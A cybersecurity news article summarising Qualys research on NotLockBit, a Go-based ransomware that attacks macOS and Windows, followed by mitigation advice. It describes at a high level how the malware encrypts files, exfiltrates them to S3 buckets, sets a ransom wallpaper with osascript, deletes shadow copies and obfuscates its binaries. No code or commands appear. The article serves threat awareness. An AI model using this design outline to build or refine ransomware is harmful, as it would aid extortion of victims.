NotLockBit – Previously Unknown Ransomware Attack Windows & macOS

A new and advanced ransomware family, dubbed NotLockBit, has emerged as a significant threat in the cybersecurity landscape, closely mimicking the behavior and tactics of the notorious LockBit ransomware.

NotLockBit notably distinguishes itself by being one of the first ransomware strains designed to effectively attack both macOS and Windows operating systems, showcasing powerful cross-platform capabilities.

Overview of NotLockBit’s Capabilities

Distributed as an x86_64 binary written in the Go programming language, NotLockBit exhibits a sophisticated design, equipped with advanced features such as:

• Targeted File Encryption: Focuses on encrypting valuable or sensitive data using robust encryption protocols like AES and RSA.
• Data Exfiltration: Transfers stolen files to attacker-controlled repositories, often leveraging Amazon S3 buckets or similar cloud storage, for potential double-extortion tactics.
• Self-Deletion Mechanisms: Deletes traces of its presence, including shadow copies, to ensure that recovery is nearly impossible.

“Our analysis reveals that this new strain demonstrates advanced capabilities, including targeted file encryption, data exfiltration, and self-deletion mechanisms.” CSN learned from detailed Qualys research.

2024 MITRE ATT&CK Evaluation Results for SMEs & MSPs -> Download Free Guide

Technical Insights Into NotLockBit’s Functionality

Upon execution, NotLockBit begins with a reconnaissance phase, particularly on macOS systems.

It uses the go-sysinfo module to collect detailed system information, such as hardware specifications, operating system details, network configuration, and unique identifiers (UUIDs).

The ransomware employs a sophisticated three-step encryption process:

1. Decodes an embedded RSA public key from a PEM file.
2. Generates a random master encryption key, which is securely encrypted using the RSA details.
3. Encrypts user files while skipping critical system directories like /proc/, /sys/, and /dev/.

Encrypted files are saved in their original location but renamed with a unique identifier and appended with an .abcd extension. The ransomware deletes the original files to make decryption without the private key virtually impossible.

NotLockBit focuses on a variety of file types, including but not limited to:

• Personal documents: .doc, .pdf, .txt
• Professional files: .csv, .xls, .ppt
• Multimedia: .jpg, .png, .mpg
• Virtual machine data: .vmdk, .vmsd, .vbox

The comprehensive targeting emphasizes the ransomware’s attempt to extract maximum value from user systems.

Going beyond encryption, NotLockBit exfiltrates sensitive files to attacker-controlled storage, typically an Amazon S3 bucket.

This step paves the way for a double-extortion strategy, where stolen data is threatened to be disclosed or sold unless the ransom is paid.

Once encryption is complete, NotLockBit alters the victim’s desktop wallpaper, replacing it with a ransom note.

On macOS devices, this is achieved using the osascript command, which programmatically interacts with the operating system to change the background image.

The ransomware concludes its attack by executing a self-deletion mechanism, removing its binary and traces of execution from the victim’s system. This also includes deleting shadow copies, further complicating recovery efforts.

NotLockBit employs various levels of obfuscation to evade detection:

• Some samples include visible function names.
• Others use obfuscated or fully stripped binaries, making reverse engineering and threat analysis more challenging.

Interestingly, researchers observed variants omitting data exfiltration capabilities, focusing solely on encryption. This suggests tailored attack strategies or ongoing development of the ransomware.

Detection and Mitigation

The Qualys EDR & EPP security solutions can detect and quarantine NotLockBit as soon as it is downloaded.

Security professionals are encouraged to utilize advanced hunting queries to analyze and mitigate the ransomware’s impact. Notwithstanding this, organizations should implement robust cybersecurity measures, including:

1. Regular Backups: Maintain offline backups of critical data.
2. Endpoint Protection: Use advanced detection solutions capable of identifying ransomware behavior.
3. Network Security: Employ firewalls, intrusion detection systems, and access controls.
4. User Awareness: Educate employees about phishing, social engineering, and other cybercriminal tactics.

The emergence of NotLockBit, particularly its dual compatibility with macOS and Windows systems, signals a worrying trend in ransomware development.

Its ability to mimic established ransomware families, such as LockBit, and its use of exfiltration tactics emphasize the increasing complexity of cyber threats.

This ransomware family demands close monitoring by security researchers and robust defenses by organizations to thwart its potentially devastating consequences.

Read Ransomware prevention checklist, As always, vigilance and preparedness remain critical in combating the evolving ransomware landscape.

Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free